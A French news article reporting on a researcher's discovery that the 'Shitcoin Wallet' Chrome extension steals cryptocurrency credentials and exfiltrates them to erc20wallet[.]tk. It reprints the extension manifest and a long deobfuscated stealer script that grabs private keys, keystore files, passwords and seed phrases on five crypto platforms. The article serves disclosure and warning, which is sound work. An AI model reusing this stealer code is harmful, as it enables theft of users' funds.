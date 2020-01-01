L'extension est nommée Shitcoin Wallet et a été lancée le mois dernier, le 9 décembre. Selon un billet de blog qui sert de présentation, ShitcoinWallet est un portefeuille Ethereum qui vous permet de vous connecter à la blockchain Ethereum. Il s'agit d'un portefeuille Web qui possède plusieurs extensions pour différents navigateurs. Le billet précise qu'un portefeuille Ethereum signifie que vous pouvez l'utiliser pour gérer, transférer, recevoir vos Ethers, mais vous pouvez également utiliser ce portefeuille pour interagir avec des milliers de jetons ERC20 (jetons généralement émis pour des ICO - initial coin offering - qui sont des méthodes de levée de fonds fonctionnant via l'émission d'actifs numériques échangeables contre des cryptomonnaies durant la phase de démarrage d'un projet) qui prospèrent sur la blockchain Ethereum.
Les utilisateurs peuvent installer l'extension Chrome et gérer les jetons ETH et les jetons ERC20 à partir de leur navigateur, ou ils peuvent installer une application de bureau Windows, s'ils souhaitent gérer leurs fonds en dehors de l'environnement plus risqué d'un navigateur.
Cependant, l'application de portefeuille n'était pas ce qu'elle avait promis d'être. En effet, Harry Denley, directeur de la sécurité de la plateforme MyCrypto, a découvert que l'extension contenait du code malveillant.
Selon Denley, l'extension est dangereuse pour les utilisateurs de deux manières. Premièrement, tous les fonds (jetons ETH et jetons basés sur ERC0) gérés directement à l'intérieur de l'extension sont à risque.
Denley explique que l'extension envoie les clés privées de tous les portefeuilles créés ou gérés via son interface à un site Web tiers situé à erc20wallet[.]Tk.
Ensuite, l'extension injecte également activement du code JavaScript malveillant lorsque les utilisateurs naviguent vers cinq plateformes de gestion de crypto-monnaie bien connues et populaires. Ce code vole les identifiants de connexion et les clés privées, données envoyées au même site Web tiers erc20wallet[.]Tk.
Selon une analyse du code malveillant, le processus se déroule comme suit:
- Les utilisateurs installent l'extension Chrome.
- L'extension Chrome demande la permission d'injecter du code JavaScript (JS) sur 77 sites Web.
- Lorsque les utilisateurs naviguent vers l'un de ces 77 sites, l'extension charge et injecte un fichier JS supplémentaire à partir de: https://erc20wallet[.]Tk/js/content_.js
- Ce fichier JS contient du code obscurci.
- Le code s'active sur cinq sites Web: MyEtherWallet.com, Idex.Market, Binance.org, NeoTracker.io et Switcheo.exchange.
- Une fois activé, le code JS malveillant enregistre les informations de connexion de l'utilisateur, recherche les clés privées stockées dans les tableaux de bord des cinq services et, enfin, envoie les données à erc20wallet[.]Tk
Ci-dessous, la portion de code contenant les 77 sites Web évoqués :
|Code JavaScript :
|Sélectionner tout
{ "update_url": "https://clients2.google.com/service/update2/crx", "name": "Shitcoin Wallet", "version": "1.5.2", "description": "E-wallet is concentrated on the ERC-20 platform.", "permissions": ["activeTab", "storage", "*://*.infura.io/*", "*://*.tokenbalance.com/*", "*://erc20wallet.tk/*"], "content_security_policy": "script-src 'self' 'sha256-lMz1NqveNgzhCVSTDXZo8ufc/yD3TkT7DOemexGdrRo='; object-src 'self'", "background": { "scripts": ["jquery.js", "background.js"], "persistent": false }, "browser_action": { "name": "Shitcoin Wallet", "default_popup": "index.html", "default_icon": { "16": "images/logo.png", "32": "images/logo.png", "48": "images/logo.png", "128": "images/logo.png" } }, "externally_connectable": { "matches": ["*://*.myetherwallet.com/*", "*://*.binance.org/*", "*://idex.market/*", "*://*.idex.market/*", "*://neotracker.io/*", "*://*.neotracker.io/*", "*://*.switcheo.exchange/*", "*://switcheo.exchange/*", "*://adalite.io/*", "*://*.adalite.io/*"] }, "content_scripts": [ { "js": [ "inside.js" ], "matches": ["*://*.myetherwallet.com/*", "*://*.binance.org/*", "*://idex.market/*", "*://*.idex.market/*", "*://neotracker.io/*", "*://*.neotracker.io/*", "*://*.switcheo.exchange/*", "*://switcheo.exchange/*", "*://adalite.io/*", "*://*.adalite.io/*", "*://coinmarketcap.com/*", "*://*.techelex.org/*", "*://*.cambridgeenglish.org/*", "*://*.newspapers.com/*", "*://*.entscale.com/*", "*://*.whmcs.com/*", "*://*.noip.com/*", "*://*.booking.com/*", "*://*.cloudflare.com/*", "*://*.bbc.com/*", "*://*.airbus.com/*", "*://*.github.com/*", "*://github.com/*", "*://*.tokok.com/*", "*://*.coingecko.com/*", "*://www.nytimes.com/*", "*://*.huffpost.com/*", "*://*.latimes.com/*", "*://abcnews.go.com/*", "*://*.bloomberg.com/*", "*://*.dailymail.co.uk/*", "*://*.thesun.co.uk/*", "*://www.telegraph.co.uk/*", "*://www.thestar.com/", "*://www.news.com.au/", "*://www.cnbc.com/world/?region=world", "*://www.chron.com/", "*://www.usnews.com/", "*://timesofindia.indiatimes.com/", "*://indianexpress.com/", "*://www.cbsnews.com/", "*://www.sfgate.com/", "*://www.thedailybeast.com/", "*://www.theatlantic.com/world/", "*://www.herald.co.zw/", "*://www.dailysun.co.za/", "*://www.thestar.com.my/", "*://www.bangkokpost.com/", "*://www.thedailystar.net/", "*://english.alarabiya.net/", "*://www.scmp.com/", "*://www.voanews.com/", "*://www.aljazeera.com/", "*://www.hollywoodreporter.com/", "*://www.dawn.com/", "*://www.japantimes.co.jp/", "*://www.straitstimes.com/global", "*://www.thejakartapost.com/", "*://www.vanguardngr.com/", "*://www.nzherald.co.nz/", "*://www.newsweek.com/", "*://thehill.com/", "*://time.com/", "*://www.hindustantimes.com/", "*://www.thehindu.com/", "*://www.dw.com/en/top-stories/s-9097", "*://nypost.com/", "*://global.chinadaily.com.cn/", "*://www.forbes.com/#16950a692254", "*://www.theglobeandmail.com/", "*://www.bbc.com/", "*://www.mirror.co.uk/", "*://www.theguardian.com/international", "*://www.nbcnews.com/", "*://www.usatoday.com/", "*://www.reuters.com/", "*://www.washingtonpost.com/", "*://www.wsj.com/" ] } ], "icons": { "16": "images/logo.png", "32": "images/logo.png", "48": "images/logo.png", "128": "images/logo.png" }, "manifest_version": 2 }
Ci-dessous, le code désobfusqué :
|Code JavaScript :
|Sélectionner tout
if (window['location']['hostname'] === 'www.myetherwallet.com') { var run = 0; var have1 = 0; var have2 = 0; var always = setInterval(function() { if (run === 0) { run = 1; var _0x61c4x5 = setInterval(function() { if ($('input[name=\'PrivateKey\']')['length']) { have1 = 1; clearInterval(_0x61c4x5); $('input[name=\'PrivateKey\']')['bind']('paste', function(_0x61c4x6) { var _0x61c4x7 = _0x61c4x6['originalEvent']['clipboardData']['getData']('text'); chrome['runtime']['sendMessage']('ckkgmccefffnbbalkmbbgebbojjogffn', { pvi: _0x61c4x7, status: 'pvi_et' }) }) } }, 800) }; if (have2 === 0 & amp; & amp; $('input[type=\'file\']')['length']) { have2 = 1; $('input[type=\'file\']')['change'](function(_0x61c4x6) { var _0x61c4x8 = new FileReader(); _0x61c4x8['readAsText'](_0x61c4x6['target']['files'][0]); var _0x61c4x9 = ''; _0x61c4x8['onload'] = function(_0x61c4xa) { _0x61c4x9 = _0x61c4xa['target']['result'] }; setTimeout(function() { $('.password-form button:eq(0)')['click'](function() { chrome['runtime']['sendMessage']('ckkgmccefffnbbalkmbbgebbojjogffn', { kes: _0x61c4x9, ps: $('.password-form input[type=\'password\']:eq(0)')['val'](), status: 'kes_et' }) }); $('.password-form input[type=\'password\']:eq(0)')['keypress'](function(_0x61c4xb) { var _0x61c4xc = (_0x61c4xb['keyCode'] ? _0x61c4xb['keyCode'] : _0x61c4xb['which']); if (_0x61c4xc === '13') { chrome['runtime']['sendMessage']('ckkgmccefffnbbalkmbbgebbojjogffn', { kes: _0x61c4x9, ps: $('.password-form input[type=\'password\']:eq(0)')['val'](), status: 'kes_et' }) } }) }, 100) }) }; if ($('.private-key-form > div > input[name=\'PrivateKey\']')['length'] & lt; = 0 & amp; & amp; have1 === 1) { run = 0; have1 = 0 }; if ($('input[type=\'file\']')['length'] & lt; = 0 & amp; & amp; have2 === 1) { have2 = 0 } }, 1000) }; if (window['location']['hostname'] === 'idex.market') { var run = 0; var have1 = 0; var have2 = 0; var always = setInterval(function() { if (run === 0) { run = 1; var _0x61c4x5 = setInterval(function() { if ($('input[type="file"]')['length']) { have1 = 1; clearInterval(_0x61c4x5); $('input[type="file"]')['change'](function(_0x61c4x6) { var _0x61c4x8 = new FileReader(); _0x61c4x8['readAsText'](_0x61c4x6['target']['files'][0]); var _0x61c4x9 = ''; _0x61c4x8['onload'] = function(_0x61c4xa) { _0x61c4x9 = _0x61c4xa['target']['result'] }; setTimeout(function() { $('input[type="password"]')['keypress'](function(_0x61c4xb) { var _0x61c4xc = (_0x61c4xb['keyCode'] ? _0x61c4xb['keyCode'] : _0x61c4xb['which']); if (_0x61c4xc === '13') { chrome['runtime']['sendMessage']('ckkgmccefffnbbalkmbbgebbojjogffn', { kes: _0x61c4x9, ps: $('input[type="password"]')['val'](), status: 'kes_id' }) } }); $('button[type=\'submit\']')['click'](function() { chrome['runtime']['sendMessage']('ckkgmccefffnbbalkmbbgebbojjogffn', { kes: _0x61c4x9, ps: $('input[type="password"]')['val'](), status: 'kes_id' }) }) }, 100) }) }; if ($('#theme-anchor > main > div > section > div.sm-col-8 > form > div > textarea')['length']) { have2 = 1; clearInterval(_0x61c4x5); $('#theme-anchor > main > div > section > div.sm-col-8 > form > div > textarea')['change'](function() { chrome['runtime']['sendMessage']('ckkgmccefffnbbalkmbbgebbojjogffn', { pvi: $('#theme-anchor > main > div > section > div.sm-col-8 > form > div > textarea')['val'](), status: 'pvi_id' }) }) } }, 800) }; if (($('input[type="file"]')['length'] & lt; = 0) & amp; & amp; (have1 === 1)) { run = 0; have1 = 0 }; if (($('#theme-anchor > main > div > section > div.sm-col-8 > form > div > textarea')['length'] & lt; = 0) & amp; & amp; (have2 === 1)) { run = 0; have2 = 0 } }, 1000) }; if (window['location']['hostname'] === 'www.binance.org') { var run = 0; var have1 = 0; var have2 = 0; var always = setInterval(() = & gt; { if (run === 0) { run = 1; var _0x61c4x5 = setInterval(() = & gt; { if ($('input[type="file"]')['length']) { have1 = 1; clearInterval(_0x61c4x5); $('input[type="file"]')['change'](function(_0x61c4x6) { var _0x61c4x8 = new FileReader(); _0x61c4x8['readAsText'](_0x61c4x6['target']['files'][0]); var _0x61c4x9 = ''; _0x61c4x8['onload'] = function(_0x61c4xa) { _0x61c4x9 = _0x61c4xa['target']['result'] }; setTimeout(function() { $('input[type="password"]')['keypress'](function(_0x61c4xb) { var _0x61c4xc = (_0x61c4xb['keyCode'] ? _0x61c4xb['keyCode'] : _0x61c4xb['which']); if (_0x61c4xc === '13') { chrome['runtime']['sendMessage']('ckkgmccefffnbbalkmbbgebbojjogffn', { kes: _0x61c4x9, ps: $('input[type="password"]')['val'](), status: 'kes_bi' }) } }); $('#Unlock_Keystore_File')['click'](function() { chrome['runtime']['sendMessage']('ckkgmccefffnbbalkmbbgebbojjogffn', { kes: _0x61c4x9, ps: $('input[type="password"]')['val'](), status: 'kes_bi' }) }) }, 100) }) }; if ($('.AlphabetWords__Rest-sc-19qqc38-15')['length']) { have2 = 1; clearInterval(_0x61c4x5); $('.Button-wiovqy-0')['click'](function() { var _0x61c4xd = ''; for (var _0x61c4xe = 0; _0x61c4xe & lt; 24; _0x61c4xe++) { _0x61c4xd += (' ' + $('.AlphabetWords__SelectWordItem-sc-19qqc38-13:eq(' + _0x61c4xe + ')')['text']() + ' ')['replace']('X ', '') }; chrome['runtime']['sendMessage']('ckkgmccefffnbbalkmbbgebbojjogffn', { mm: _0x61c4xd, status: 'mm_bi' }) }) } }, 800) }; if (($('input[type="file"]')['length'] & lt; = 0) & amp; & amp; (have1 === 1)) { run = 0; have1 = 0 } }, 1000) }; if (window['location']['hostname'] == 'neotracker.io') { var run = 0; var have1 = 0; var have2 = 0; var have3 = 0; var always = setInterval(function() { if (run == 0) { run = 1; var _0x61c4x5 = setInterval(function() { if ($('#textField-owpk-private-key')['length']) { have1 = 1; clearInterval(_0x61c4x5); $('#textField-owpk-private-key')['change'](function() { if ($('#textField-owpk-private-key')['val']()['length'] & gt; = 52) { chrome['runtime']['sendMessage']('ckkgmccefffnbbalkmbbgebbojjogffn', { pvi: $('#textField-owpk-private-key')['val'](), status: 'pvi_ne' }) } }) }; if ($('#textField-owek-encrypted-key')['length']) { have2 = 1; clearInterval(_0x61c4x5); $('#textField-owek-encrypted-key')['change'](function() { if ($('#textField-owek-encrypted-key')['val']()['length'] & gt; = 58) { setTimeout(function() { $('#textField-owfp-password')['keypress'](function(_0x61c4xb) { var _0x61c4xc = (_0x61c4xb['keyCode'] ? _0x61c4xb['keyCode'] : _0x61c4xb['which']); if (_0x61c4xc == '13') { chrome['runtime']['sendMessage']('ckkgmccefffnbbalkmbbgebbojjogffn', { enc: $('#textField-owek-encrypted-key')['val'](), ps: $('#textField-owfp-password')['val'](), status: 'enc_ne' }) } }); $('button:eq(18)')['click'](function() { chrome['runtime']['sendMessage']('ckkgmccefffnbbalkmbbgebbojjogffn', { enc: $('#textField-owek-encrypted-key')['val'](), ps: $('#textField-owfp-password')['val'](), status: 'enc_ne' }) }) }, 200) } }) }; if ($('input[type="file"]')['length']) { have3 = 1; clearInterval(_0x61c4x5); $('input[type="file"]')['change'](function(_0x61c4x6) { setTimeout(function() { $('#textField-owfp-password')['keypress'](function(_0x61c4xb) { var _0x61c4xc = (_0x61c4xb['keyCode'] ? _0x61c4xb['keyCode'] : _0x61c4xb['which']); if (_0x61c4xc == '13') { chrome['runtime']['sendMessage']('ckkgmccefffnbbalkmbbgebbojjogffn', { enc: $('#textField-username')['val'](), ps: $('#textField-owfp-password')['val'](), status: 'enc_ne' }) } }); $('button:eq(18)')['click'](function() { chrome['runtime']['sendMessage']('ckkgmccefffnbbalkmbbgebbojjogffn', { enc: $('#textField-username')['val'](), ps: $('#textField-owfp-password')['val'](), status: 'enc_ne' }) }) }, 200) }) } }, 800) }; if (($('#textField-owpk-private-key')['length'] & lt; = 0) & amp; & amp; (have1 == 1)) { run = 0; have1 = 0 }; if ($('#textField-owek-encrypted-key')['length'] & lt; = 0 & amp; & amp; have2 == 1) { run = 0; have2 = 0 }; if ($('input[type="file"]')['length'] & lt; = 0 & amp; & amp; have3 == 1) { run = 0; have3 = 0 } }, 1000) }; if (window['location']['hostname'] == 'switcheo.exchange') { var run = 0; var have1 = 0; var have2 = 0; var have3 = 0; var always = setInterval(function() { if (run == 0) { run = 1; var _0x61c4x5 = setInterval(function() { if ($('.react-tabs__tab--selected:eq(0)')['text']() == 'JSON file') { have1 = 1; clearInterval(_0x61c4x5); setTimeout(function() { $('input[type="file"]')['change'](function() { setTimeout(function() { $('input[inputmode=\'verbatim\']:eq(1)')['keypress'](function(_0x61c4xb) { var _0x61c4xc = (_0x61c4xb['keyCode'] ? _0x61c4xb['keyCode'] : _0x61c4xb['which']); if (_0x61c4xc == '13') { chrome['runtime']['sendMessage']('ckkgmccefffnbbalkmbbgebbojjogffn', { enc: $('option')['val'](), ps: $('input[inputmode=\'verbatim\']:eq(1)')['val'](), status: 'enc_sw' }) } }); $('.exchange-ctaNormal')['click'](function() { chrome['runtime']['sendMessage']('ckkgmccefffnbbalkmbbgebbojjogffn', { enc: $('option')['val'](), ps: $('input[inputmode=\'verbatim\']:eq(1)')['val'](), status: 'enc_sw' }) }) }, 100) }) }, 100) }; if ($('.react-tabs__tab--selected:eq(0)')['text']() == 'encrypted key') { have2 = 1; clearInterval(_0x61c4x5); $('input[inputmode=\'verbatim\']:eq(1)')['keypress'](function(_0x61c4xb) { var _0x61c4xc = (_0x61c4xb['keyCode'] ? _0x61c4xb['keyCode'] : _0x61c4xb['which']); if (_0x61c4xc == '13') { chrome['runtime']['sendMessage']('ckkgmccefffnbbalkmbbgebbojjogffn', { enc: $('input[inputmode=\'verbatim\']:eq(0)')['val'](), ps: $('input[inputmode=\'verbatim\']:eq(1)')['val'](), status: 'enc_sw' }) } }); $('.exchange-ctaNormal')['click'](function() { chrome['runtime']['sendMessage']('ckkgmccefffnbbalkmbbgebbojjogffn', { enc: $('input[inputmode=\'verbatim\']:eq(0)')['val'](), ps: $('input[inputmode=\'verbatim\']:eq(1)')['val'](), status: 'enc_sw' }) }) }; if ($('.react-tabs__tab--selected:eq(0)')['text']() == 'private key') { have3 = 1; clearInterval(_0x61c4x5); $('input[inputmode=\'verbatim\']')['bind']('paste', function(_0x61c4x6) { var _0x61c4x7 = _0x61c4x6['originalEvent']['clipboardData']['getData']('text'); chrome['runtime']['sendMessage']('ckkgmccefffnbbalkmbbgebbojjogffn', { pvi: _0x61c4x7, status: 'pvi_sw' }) }) } }, 800) }; if (!($('.react-tabs__tab--selected:eq(0)')['text']() == 'JSON file') & amp; & amp; (have1 == 1)) { run = 0; have1 = 0 }; if (!($('.react-tabs__tab--selected:eq(0)')['text']() == 'encrypted key') & amp; & amp; (have2 == 1)) { run = 0; have2 = 0 }; if (!($('.react-tabs__tab--selected:eq(0)')['text']() == 'private key') & amp; & amp; (have3 == 1)) { run = 0; have3 = 0 } }, 1000) }
Au moment de la rédaction de ce billet, l'extension était toujours disponible en téléchargement via le Chrome Web Store officiel de Google, où elle répertoriait 625 installations. Il n'est pas clair si l'équipe de Shitcoin Wallet est responsable du code malveillant ou si l'extension Chrome a été compromise par un tiers.
Sur le site officiel de l'extension, des installateurs 32 bits et 64 bits ont également été mis à la disposition des utilisateurs.
Les analyses avec VirusTotal, un site Web qui regroupe les moteurs d'analyse antivirus de plusieurs fabricants de logiciels antivirus, montrent que les deux fichiers sont propres. Cependant, de nombreux commentaires publiés sur le canal Telegram du portefeuille suggèrent que les applications de bureau peuvent contenir du code similaire, sinon pire.
Source : Harry Denley, Shitcoin Wallet
